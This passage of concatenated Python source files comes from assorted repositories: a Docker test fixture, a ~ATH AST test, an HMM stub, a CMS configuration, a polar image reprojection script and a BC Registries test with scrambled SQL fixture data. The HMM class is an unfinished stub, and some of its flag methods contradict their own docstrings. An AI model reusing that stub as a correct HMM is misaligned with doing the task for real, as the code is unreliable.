ots_upgrade(args)
| 33.726852
| 207
| 0.650377
|
34930793f5479d421143fdadea404fa86e33751b
| 332
|
py
|
Python
|
tests/blackbox/conftest.py
|
biocatchltd/Heksher
|
b50b3659a606cb188437adb1f95747efb3ba7b59
|
[
"MIT"
] | 3
|
2021-01-21T11:41:06.000Z
|
2021-10-20T06:51:53.000Z
|
tests/blackbox/conftest.py
|
biocatchltd/Heksher
|
b50b3659a606cb188437adb1f95747efb3ba7b59
|
[
"MIT"
] | 18
|
2021-02-01T06:38:53.000Z
|
2022-02-14T13:46:33.000Z
|
tests/blackbox/conftest.py
|
biocatchltd/Heksher
|
b50b3659a606cb188437adb1f95747efb3ba7b59
|
[
"MIT"
] | null | null | null |
from docker import DockerClient
from pytest import fixture
@fixture(scope='session')
def docker_client():
# todo improve when yellowbox is upgraded
try:
ret = DockerClient.from_env()
ret.ping()
except Exception:
return DockerClient(base_url='tcp://localhost:2375')
else:
return ret
| 22.133333
| 60
| 0.671687
|
0aa3199c6901dc582ca0d843e830d822aa796709
| 993
|
py
|
Python
|
script/debug ast/ast_IfJump.py
|
virtuNat/discord.ATH
|
fb6473708cc0c1db2d5d5ba48ea53c1d6a8b0bb9
|
[
"MIT"
] | 2
|
2017-12-12T03:34:59.000Z
|
2017-12-17T22:33:37.000Z
|
script/debug ast/ast_IfJump.py
|
GiovanH/discord.-ATH
|
aa73ccd56736525a7f7018e4e11ab5b6ea706e88
|
[
"MIT"
] | null | null | null |
script/debug ast/ast_IfJump.py
|
GiovanH/discord.-ATH
|
aa73ccd56736525a7f7018e4e11ab5b6ea706e88
|
[
"MIT"
] | 2
|
2017-11-16T03:43:24.000Z
|
2017-11-30T06:07:37.000Z
|
#!/usr/bin/env python
from athstmt import *
from athinterpreter import TildeAthInterp
stmts = AthStatementList([
AthTokenStatement('PROCREATE', [IdentifierToken('TEST'), None]),
TildeAthLoop(False, AthStatementList([
CondiJump([IdentifierToken('TEST'), 3]),
AthTokenStatement('print', [LiteralToken('Test!\\n', str)]),
AthTokenStatement('REPLICATE', [IdentifierToken('TEST'), UnaryExpr(['!', IdentifierToken('TEST')])]),
CondiJump([None, 5]),
CondiJump([UnaryExpr(['!', IdentifierToken('TEST')]), 3]),
AthTokenStatement('print', [LiteralToken('Test died\\n', str)]),
AthTokenStatement('DIE', [IdentifierToken('THIS')]),
CondiJump([None, 1]),
AthTokenStatement('print', [LiteralToken('should not print\\n', str)]),
], pendant='THIS'),
AthTokenStatement('EXECUTE', [IdentifierToken('NULL')]))
], pendant='THIS')
if __name__ == '__main__':
TildeAthInterp().exec_stmts('IfJump.~ATH', stmts)
| 43.173913
| 109
| 0.645519
|
2d0c3fc6520b68a085d096b9b11063d85980024d
| 2,885
|
py
|
Python
|
pyrobolearn/models/hmm/hmm.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | 2
|
2021-01-21T21:08:30.000Z
|
2022-03-29T16:45:49.000Z
|
pyrobolearn/models/hmm/hmm.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | null | null | null |
pyrobolearn/models/hmm/hmm.py
|
Pandinosaurus/pyrobolearn
|
9cd7c060723fda7d2779fa255ac998c2c82b8436
|
[
"Apache-2.0"
] | 1
|
2020-09-29T21:25:39.000Z
|
2020-09-29T21:25:39.000Z
|
# This file describes the Hidden Markov Model
# -*- coding: utf-8 -*-
# TODO: implement this model
from gaussian import Gaussian
from model import Model
from hmmlearn.hmm import GaussianHMM
class HMM(object):
r"""Hidden Markov Models
Description: emission probabilities, transition probabilities,...
References:
[1] "Pattern Recognition and Machine Learning" (chap 13), Bishop, 2006
The code was inspired by the following codes:
* `hmmlearn`: https://github.com/hmmlearn/hmmlearn
* `ghmm`: http://ghmm.sourceforge.net/
* `pbdlib`: https://gitlab.idiap.ch/rli/pbdlib-python/tree/master/pbdlib
"""
def __init__(self, emission_prob=None):
if emission_prob is None or (isinstance(emission_prob, str) and emission_prob.lower() == 'gaussian'):
emission_prob = Gaussian()
##############
# Properties #
##############
##################
# Static Methods #
##################
@staticmethod
def copy(other):
if not isinstance(other, HMM):
raise TypeError("Trying to copy an object which is not a HMM")
@staticmethod
def isParametric():
"""The HMM is a parametric model"""
return True
@staticmethod
def isLinear():
"""The HMM is a non-linear model"""
return True
@staticmethod
def isRecurrent():
"""The HMM is recurrent; current outputs depends on previous inputs and states"""
return True
@staticmethod
def isProbabilistic():
"""The HMM a probabilistic model"""
return False
@staticmethod
def isDiscriminative():
"""The HMM is a discriminative model"""
return False
@staticmethod
def isGenerative():
"""The HMM is a generative model which models the joint distributions on states and outputs.
This means we can sample from it."""
return True
###########
# Methods #
###########
def likelihood(self):
pass
# alias
pdf = likelihood
def joint_pdf(self, X, Z):
pass
def sample(self, size=None, seed=None):
"""
Sample from the HMM.
Args:
size:
seed:
Returns:
"""
pass
def expectation_step(self):
"""
Expectation step in the expectation-maximization algorithm.
Returns:
"""
pass
def maximization_step(self):
pass
def expectation_maximization(self, X):
"""Expectation-Maximization (EM) algorithm"""
pass
def forward_backward(self):
"""Forward backward algorithm"""
pass
def sum_product(self):
"""Sum-product algorithm"""
pass
def viterbi(self):
"""Viterbi algorithm"""
pass
class HSMM(HMM):
r"""Hidden semi-Markov Models
"""
pass
| 21.691729
| 109
| 0.581282
|
effb8307d9b417e58b1bf4bbd557bd63b2e4224f
| 750
|
py
|
Python
|
HLTrigger/Configuration/python/HLT_75e33/eventsetup/hltCandidateJetProbabilityComputer_cfi.py
|
PKUfudawei/cmssw
|
8fbb5ce74398269c8a32956d7c7943766770c093
|
[
"Apache-2.0"
] | 1
|
2021-11-30T16:24:46.000Z
|
2021-11-30T16:24:46.000Z
|
HLTrigger/Configuration/python/HLT_75e33/eventsetup/hltCandidateJetProbabilityComputer_cfi.py
|
PKUfudawei/cmssw
|
8fbb5ce74398269c8a32956d7c7943766770c093
|
[
"Apache-2.0"
] | 4
|
2021-11-29T13:57:56.000Z
|
2022-03-29T06:28:36.000Z
|
HLTrigger/Configuration/python/HLT_75e33/eventsetup/hltCandidateJetProbabilityComputer_cfi.py
|
PKUfudawei/cmssw
|
8fbb5ce74398269c8a32956d7c7943766770c093
|
[
"Apache-2.0"
] | 1
|
2021-11-30T16:16:05.000Z
|
2021-11-30T16:16:05.000Z
|
import FWCore.ParameterSet.Config as cms
hltCandidateJetProbabilityComputer = cms.ESProducer("CandidateJetProbabilityESProducer",
a_dR = cms.double(-0.001053),
a_pT = cms.double(0.005263),
b_dR = cms.double(0.6263),
b_pT = cms.double(0.3684),
deltaR = cms.double(0.3),
impactParameterType = cms.int32(0),
max_pT = cms.double(500),
max_pT_dRcut = cms.double(0.1),
max_pT_trackPTcut = cms.double(3),
maximumDecayLength = cms.double(5.0),
maximumDistanceToJetAxis = cms.double(0.07),
min_pT = cms.double(120),
min_pT_dRcut = cms.double(0.5),
minimumProbability = cms.double(0.005),
trackIpSign = cms.int32(1),
trackQualityClass = cms.string('any'),
useVariableJTA = cms.bool(False)
)
| 34.090909
| 88
| 0.688
|
84fa1c3fdf7c7bd189fb84d48ab1971564996570
| 3,682
|
py
|
Python
|
scripts/environments/hexagon/convert_to_polar.py
|
bhillmann/hexalys
|
c6c102b90e2684f1c85992eaae6325b8be0c8aa6
|
[
"MIT"
] | null | null | null |
scripts/environments/hexagon/convert_to_polar.py
|
bhillmann/hexalys
|
c6c102b90e2684f1c85992eaae6325b8be0c8aa6
|
[
"MIT"
] | null | null | null |
scripts/environments/hexagon/convert_to_polar.py
|
bhillmann/hexalys
|
c6c102b90e2684f1c85992eaae6325b8be0c8aa6
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
import scipy.ndimage
def main():
from environments.hexagon import open_hexagon_emulator
img = open_hexagon_emulator.captureIm()
plot_cart_image(img)
plot_polar_image(img)
def plot_polar_image(data, origin=None):
"""Plots an image reprojected into polar coordinages with the origin
at "origin" (a tuple of (x0, y0), defaults to the center of the image)"""
polar_grid, r, theta = reproject_image_into_polar(data, origin)
plt.figure()
plt.imshow(polar_grid[::-1])
plt.xlabel('Theta Coordinate (radians)')
plt.ylabel('R Coordinate (pixels)')
plt.title('Image in Polar Coordinates')
plt.savefig('polar_img.png')
def plot_cart_image(data, origin=None):
"""Plots an image reprojected into polar coordinages with the origin
at "origin" (a tuple of (x0, y0), defaults to the center of the image)"""
plt.figure()
ny, nx = data.shape[:2]
plt.imshow(data)
plt.xlabel('Width')
plt.ylabel('Height')
plt.title('Image in Cartesian Coordinates')
plt.savefig('cartesian_img.png')
def index_coords(data, origin=None):
"""Creates x & y coords for the indicies in a numpy array "data".
"origin" defaults to the center of the image. Specify origin=(0,0)
to set the origin to the lower left corner of the image."""
ny, nx = data.shape[:2]
if origin is None:
origin_x, origin_y = nx // 2, ny // 2
else:
origin_x, origin_y = origin
x, y = np.meshgrid(np.arange(nx), np.arange(ny))
x -= origin_x
y -= origin_y
return x, y
def cart2polar(x, y):
r = np.sqrt(x**2 + y**2)
theta = np.arctan2(y, x)
return r, theta
def polar2cart(r, theta):
x = r * np.cos(theta)
y = r * np.sin(theta)
return x, y
def bin_by(x, y, nbins=30):
"""Bin x by y, given paired observations of x & y.
Returns the binned "x" values and the left edges of the bins."""
bins = np.linspace(y.min(), y.max(), nbins+1)
# To avoid extra bin for the max value
bins[-1] += 1
indicies = np.digitize(y, bins)
output = []
for i in xrange(1, len(bins)):
output.append(x[indicies==i])
# Just return the left edges of the bins
bins = bins[:-1]
return output, bins
def reproject_image_into_polar(data, origin=None):
# Reprojects a 3D numpy array ("data") into a polar coordinate system.
# "origin" is a tuple of (x0, y0) and defaults to the center of the image.
ny, nx = data.shape[:2]
if origin is None:
origin = (nx//2, ny//2)
# Determine that the min and max r and theta coords will be...
x, y = index_coords(data, origin=origin)
r, theta = cart2polar(x, y)
# Make a regular (in polar space) grid based on the min and max r & theta
r_i = np.linspace(r.min(), r.max(), nx)
theta_i = np.linspace(theta.min(), theta.max(), ny)
theta_grid, r_grid = np.meshgrid(theta_i, r_i)
# Project the r and theta grid back into pixel coordinates
xi, yi = polar2cart(r_grid, theta_grid)
xi += origin[0] # We need to shift the origin back to
yi += origin[1] # back to the lower-left corner...
xi, yi = xi.flatten(), yi.flatten()
coords = np.vstack((xi, yi)) # (map_coordinates requires a 2xn array)
# Reproject each band individually and the restack
# (uses less memory than reprojection the 3-dimensional array in one step)
bands = []
for band in data.T:
zi = sp.ndimage.map_coordinates(band, coords, order=1)
bands.append(zi.reshape((nx, ny)))
output = np.dstack(bands)
return output, r_i, theta_i
if __name__ == '__main__':
main()
| 30.941176
| 78
| 0.648561
|
0ff6d44f888b334920506c43455f300a3e542fe5
| 208
|
py
|
Python
|
tph/learn/views.py
|
ono-t01/django-rpi-tph-monitor
|
30894d937ece11f8c7d087dd735cd79b203f0cf4
|
[
"MIT"
] | null | null | null |
tph/learn/views.py
|
ono-t01/django-rpi-tph-monitor
|
30894d937ece11f8c7d087dd735cd79b203f0cf4
|
[
"MIT"
] | null | null | null |
tph/learn/views.py
|
ono-t01/django-rpi-tph-monitor
|
30894d937ece11f8c7d087dd735cd79b203f0cf4
|
[
"MIT"
] | null | null | null |
"""
Views contoroller.
@date 10 January 2020
@author mitsuhisaT <asihustim@gmail.com>
"""
import logging
from django.shortcuts import render
logger = logging.getLogger(__name__)
# Create your views here.
| 14.857143
| 40
| 0.764423
|
75458d4d45bd100783dd847892a4fdae5a238d95
| 30,667
|
py
|
Python
|
data-pipeline/bcreg/tests/bcreg_scenario_generation_test.py
|
esune/von-bc-registries-agent
|
712008543e579eee46be23c418f2eeb41626bfcd
|
[
"Apache-2.0"
] | 1
|
2019-09-06T07:40:15.000Z
|
2019-09-06T07:40:15.000Z
|
data-pipeline/bcreg/tests/bcreg_scenario_generation_test.py
|
esune/von-bc-registries-agent
|
712008543e579eee46be23c418f2eeb41626bfcd
|
[
"Apache-2.0"
] | null | null | null |
data-pipeline/bcreg/tests/bcreg_scenario_generation_test.py
|
esune/von-bc-registries-agent
|
712008543e579eee46be23c418f2eeb41626bfcd
|
[
"Apache-2.0"
] | 1
|
2019-06-12T13:47:22.000Z
|
2019-06-12T13:47:22.000Z
|
import time
from bcreg.bcregistries import BCRegistries, system_type, MIN_START_DATE, MAX_END_DATE
from bcreg.eventprocessor import EventProcessor
from bcreg.tests.sample_corps import sample_test_corps
def test_generate_corp_sql():
specific_corps = [
'A0059733','A0040189','A0059933','A0060938','A0060045',
]
with BCRegistries(True) as bc_registries:
for corp in specific_corps:
#print('=========================')
print('===== ', corp)
bc_registries.cache_bcreg_corp_tables([corp], True)
sqls = bc_registries.generated_sqls
fake_corp_num = bc_registries.add_generated_corp_num(corp)
print('=============>>> ', fake_corp_num)
#print('=========================')
#print('sqls:')
#for sql in sqls:
# print('"""' + sql.replace(' values ', '\nvalues\n') + '""",')
#print('=========================')
with BCRegistries(True) as cached_bc_reg:
cached_bc_reg.cache_bcreg_code_tables()
cached_bc_reg.insert_cache_sqls(sqls)
# try running with dummy event id zero
corp_info = cached_bc_reg.get_bc_reg_corp_info(fake_corp_num)
#print('-------------------------')
#print('corp_info:')
#print(corp_info)
#print('-------------------------')
start_event = {'event_id':0, 'event_date':MIN_START_DATE}
end_event = {'event_id':9999999999, 'event_date':MAX_END_DATE}
with EventProcessor() as event_processor:
corp_creds = event_processor.generate_credentials(system_type, start_event, end_event, fake_corp_num, corp_info)
#print('-------------------------')
#print('corp_creds:')
#print(corp_creds)
#print('-------------------------')
def test_specific_corp_scenario():
corp_num = '6096127'
corp_sqls = [
"""create table if not exists corp_party (corp_party_id numeric, mailing_addr_id numeric, delivery_addr_id numeric, corp_num text, party_typ_cd text, start_event_id numeric, end_event_id numeric, prev_party_id numeric, corr_typ_cd text, last_report_dt timestamp, appointment_dt timestamp, cessation_dt timestamp, last_nme text, middle_nme text, first_nme text, business_nme text, bus_company_num text, email_address text, corp_party_seq_num numeric, office_notification_dt timestamp, phone text, reason_typ_cd text)""",
"""insert into corp_party (corp_party_id, mailing_addr_id, delivery_addr_id, corp_num, party_typ_cd, start_event_id, end_event_id, prev_party_id, corr_typ_cd, last_report_dt, appointment_dt, cessation_dt, last_nme, middle_nme, first_nme, business_nme, bus_company_num, email_address, corp_party_seq_num, office_notification_dt, phone, reason_typ_cd)
values
(105820465, null, null, 'FM8694883', 'FBO', 105039871, null, null, null, null, '1981-07-03 00:00:00', null, null, null, null, '0641655Y QDSSDFWICJOJESKXZ ', '6096127', null, null, null, null, null)""",
"""create table if not exists event (event_id numeric, corp_num text, event_typ_cd text, event_timestmp timestamp, trigger_dts timestamp)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511129, '6096127', 'CONVICORP', '2004-03-26 20:36:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511130, '6096127', 'FILE', '2004-03-10 00:00:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511131, '6096127', 'FILE', '2004-03-10 00:00:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(5511132, '6096127', 'FILE', '2002-02-06 00:00:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(6245683, '6096127', 'ADCORP', '2005-04-20 16:02:27', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(6245701, '6096127', 'FILE', '2005-04-20 16:06:43', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(7055682, '6096127', 'FILE', '2006-04-12 14:37:52', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(7549434, '6096127', 'FILE', '2007-03-05 09:00:12', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(7591037, '6096127', 'FILE', '2007-03-28 15:16:53', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(9141401, '6096127', 'FILE', '2009-12-15 16:51:57', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(6245023, '6096127', 'FILE', '2005-04-20 15:48:29', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8257866, '6096127', 'FILE', '2008-05-08 12:16:30', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8855073, '6096127', 'FILE', '2009-06-04 10:32:15', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8855876, '6096127', 'FILE', '2009-06-04 15:02:00', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(8855913, '6096127', 'FILE', '2009-06-04 15:11:53', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(9235934, '6096127', 'FILE', '2012-02-03 11:53:59', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(9235935, '6096127', 'FILE', '2012-02-03 11:54:30', null)""",
"""insert into event (event_id, corp_num, event_typ_cd, event_timestmp, trigger_dts)
values
(105039871, 'FM8694883', 'CONVFMREGI', '1981-07-03 00:00:00', null)""",
"""create table if not exists filing (event_id numeric, filing_typ_cd text, effective_dt timestamp, change_dt timestamp, registration_dt timestamp, period_end_dt timestamp, accession_num text, arrangement_ind text, auth_sign_dt timestamp, withdrawn_event_id numeric, ods_typ_cd text, dd_event_id numeric, access_cd text, nr_num text, court_appr_ind text, court_order_num text, agm_date timestamp, new_corp_num text)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(5511130, 'CONVL', '2004-03-10 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(5511131, 'CONVL', '2004-03-10 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(5511132, 'CONVL', '2002-02-06 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(6245023, 'ANNBC', '2005-04-20 15:48:29', null, null, '2005-02-06 00:00:00', null, 'N', null, null, 'F ', null, '102532462', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(6245701, 'TRANS', '2005-04-20 16:06:43', null, null, null, null, 'N', null, null, 'F ', 6245701, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(7055682, 'ANNBC', '2006-04-12 14:37:52', null, null, '2006-02-06 00:00:00', null, 'N', null, null, 'F ', null, '105437040', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(7549434, 'ANNBC', '2007-03-05 09:00:12', null, null, '2007-02-06 00:00:00', null, 'N', null, null, 'F ', null, '108353590', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(7591037, 'NOALA', '2007-03-28 15:16:53', null, null, null, null, 'N', null, null, 'F ', 7591037, null, 'NR6422424', null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8257866, 'ANNBC', '2008-05-08 12:16:30', null, null, '2008-02-06 00:00:00', null, 'N', null, null, 'F ', null, '111282232', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8855073, 'ANNBC', '2009-06-04 10:32:15', null, null, '2009-02-06 00:00:00', null, 'N', null, null, 'F ', null, '114301161', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8855876, 'NOALU', '2009-06-04 15:02:00', null, null, null, null, 'N', null, null, 'F ', 8855876, null, 'NR8796381', null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(8855913, 'NOCDR', '2009-06-04 15:11:53', null, null, null, null, 'N', null, null, 'F ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(9141401, 'NOCAD', '2009-12-16 00:01:00', null, null, null, null, 'N', null, null, 'F ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(9235934, 'ANNBC', '2012-02-03 11:53:59', null, null, '2010-02-06 00:00:00', null, 'N', null, null, 'F ', null, '117411967', null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(9235935, 'ANNBC', '2012-02-03 11:54:30', null, null, '2011-02-06 00:00:00', null, 'N', null, null, 'F ', null, null, null, null, null, null, null)""",
"""insert into filing (event_id, filing_typ_cd, effective_dt, change_dt, registration_dt, period_end_dt, accession_num, arrangement_ind, auth_sign_dt, withdrawn_event_id, ods_typ_cd, dd_event_id, access_cd, nr_num, court_appr_ind, court_order_num, agm_date, new_corp_num)
values
(105039871, 'FRREG', '1981-07-03 00:00:00', null, null, null, null, null, null, null, 'P ', null, null, null, null, null, null, null)""",
"""create table if not exists corporation (corp_num text, corp_frozen_typ_cd text, corp_typ_cd text, recognition_dts timestamp, last_ar_filed_dt timestamp, transition_dt timestamp, bn_9 text, bn_15 text, accession_num text, corp_password text, prompt_question text, admin_email text, send_ar_ind text, tilma_involved_ind text, tilma_cessation_dt timestamp, firm_last_image_date timestamp, os_session integer, last_agm_date timestamp, firm_lp_xp_termination_date timestamp, last_ledger_dt timestamp, ar_reminder_option text, ar_reminder_date text, temp_password text, temp_password_expiry_date timestamp)""",
"""insert into corporation (corp_num, corp_frozen_typ_cd, corp_typ_cd, recognition_dts, last_ar_filed_dt, transition_dt, bn_9, bn_15, accession_num, corp_password, prompt_question, admin_email, send_ar_ind, tilma_involved_ind, tilma_cessation_dt, firm_last_image_date, os_session, last_agm_date, firm_lp_xp_termination_date, last_ledger_dt, ar_reminder_option, ar_reminder_date, temp_password, temp_password_expiry_date)
values
('6096127', null, 'ULC', '2002-02-06 00:00:00', '2011-02-06 00:00:00', '2005-04-20 16:06:43', null, null, null, 'DXACRIXX', 'IKMQPBMP', null, 'N', 'N', null, null, null, null, null, null, null, null, null, null)""",
"""insert into corporation (corp_num, corp_frozen_typ_cd, corp_typ_cd, recognition_dts, last_ar_filed_dt, transition_dt, bn_9, bn_15, accession_num, corp_password, prompt_question, admin_email, send_ar_ind, tilma_involved_ind, tilma_cessation_dt, firm_last_image_date, os_session, last_agm_date, firm_lp_xp_termination_date, last_ledger_dt, ar_reminder_option, ar_reminder_date, temp_password, temp_password_expiry_date)
values
('FM8694883', null, 'SP', '1981-07-03 00:00:00', null, null, null, null, null, null, null, null, null, 'N', null, null, null, null, null, null, null, null, null, null)""",
"""create table if not exists conv_event (event_id numeric, effective_dt timestamp, report_corp_ind text, prev_bc_ind text, activity_user_id text, activity_dt timestamp, activity_tm timestamp, annual_file_dt timestamp, corp_cre_typ_cd text, accession_num text, dd_event_id numeric, remarks text)""",
"""create table if not exists corp_state (corp_num text, start_event_id numeric, end_event_id numeric, state_typ_cd text, dd_corp_num text)""",
"""insert into corp_state (corp_num, start_event_id, end_event_id, state_typ_cd, dd_corp_num)
values
('6096127', 5511129, null, 'ACT', null)""",
"""insert into corp_state (corp_num, start_event_id, end_event_id, state_typ_cd, dd_corp_num)
values
('FM8694883', 105039871, null, 'ACT', null)""",
"""create table if not exists tilma_involved (tilma_involved_id text, corp_num text, start_event_id text, end_event_id text, tilma_jurisdiction text, nuans_number text, nuans_expiry_date timestamp, nr_number text, jurisdiction_num text, jurisdiction_reg_date timestamp, can_number text, jurisdiction_assumed_name text, assumed_nuans_number text, assumed_nuans_name text, assumed_nuans_expiration_date timestamp, involved_ind text, cessation_date timestamp)""",
"""create table if not exists jurisdiction (corp_num text, start_event_id numeric, end_event_id numeric, dd_corp_num text, can_jur_typ_cd text, xpro_typ_cd text, home_recogn_dt timestamp, othr_juris_desc text, home_juris_num text, bc_xpro_num text, home_company_nme text, other_juris_party_id text)""",
"""create table if not exists corp_name (corp_num text, corp_name_typ_cd text, start_event_id numeric, corp_name_seq_num numeric, end_event_id numeric, srch_nme text, corp_nme text, dd_corp_num text)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('6096127', 'CO', 8855876, 1, null, 'ZRNSHTSBJWOFBYGLINWP', 'QZITQDNKIDIZKUWBCR RHFJMH', null)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('6096127', 'CO', 5511129, 0, 7591037, 'PYWAJCFUEPLUIRTCNQQB', 'OSZUOXJZVZSYKYTAADRNOPHPR', null)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('6096127', 'CO', 7591037, 1, 8855876, 'SXDEUETULEXXDMCYWTYK', 'BTNLFMWTESSLUJCWYI GBLQAY', null)""",
"""insert into corp_name (corp_num, corp_name_typ_cd, start_event_id, corp_name_seq_num, end_event_id, srch_nme, corp_nme, dd_corp_num)
values
('FM8694883', 'CO', 105039871, 0, null, 'TPTPYBIICTYEVFMKKPCF', 'FLOHTOGCRGKGIPWBZHDUZLFZC', null)""",
"""create table if not exists office (corp_num text, office_typ_cd text, start_event_id numeric, end_event_id numeric, mailing_addr_id numeric, delivery_addr_id numeric, dd_corp_num text, email_address text)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RC', 6245701, 9141401, 2836997, 2836996, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RG', 6245701, 9141401, 2836999, 2836998, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RG', 5511129, 6245701, 1606746, 1606746, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
('6096127', 'RC', 5511129, 6245701, 1606746, 1606746, null, null)""",
"""insert into office (corp_num, office_typ_cd, start_event_id, end_event_id, mailing_addr_id, delivery_addr_id, dd_corp_num, email_address)
values
